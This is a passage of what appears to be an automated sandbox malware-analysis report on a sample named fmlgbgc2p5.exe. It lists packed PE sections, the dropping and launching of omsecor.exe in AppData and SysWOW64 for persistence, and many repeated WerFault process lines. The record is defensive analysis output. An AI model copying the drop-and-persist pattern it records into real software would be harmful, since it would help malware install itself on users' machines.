            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 28_2_0040CBB5 push ecx; ret 28_2_0040CBC8
            Source: fmlgbgc2p5.exeStatic PE information: section name: .MPRESS1 entropy: 7.998409371053569
            Source: omsecor.exe.2.drStatic PE information: section name: .MPRESS1 entropy: 7.998409371053569
            Source: omsecor.exe.7.drStatic PE information: section name: .MPRESS1 entropy: 7.998409371053569

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\SysWOW64\omsecor.exeExecutable created and started: C:\Windows\SysWOW64\omsecor.exeJump to behavior
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeFile created: C:\Users\user\AppData\Roaming\omsecor.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to dropped file
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,2_2_0040350F
            Source: C:\Users\user\Desktop\fmlgbgc2p5.exeCode function: 2_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,2_2_004039EA
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 7_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,7_2_0040350F
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 7_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,7_2_004039EA
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 14_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,14_2_0040350F
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 14_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,14_2_004039EA
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 18_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,18_2_0040350F
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 18_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,18_2_004039EA
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 24_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,24_2_0040350F
            Source: C:\Windows\SysWOW64\omsecor.exeCode function: 24_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,24_2_004039EA
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 28_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,28_2_0040350F
            Source: C:\Users\user\AppData\Roaming\omsecor.exeCode function: 28_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,28_2_004039EA
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
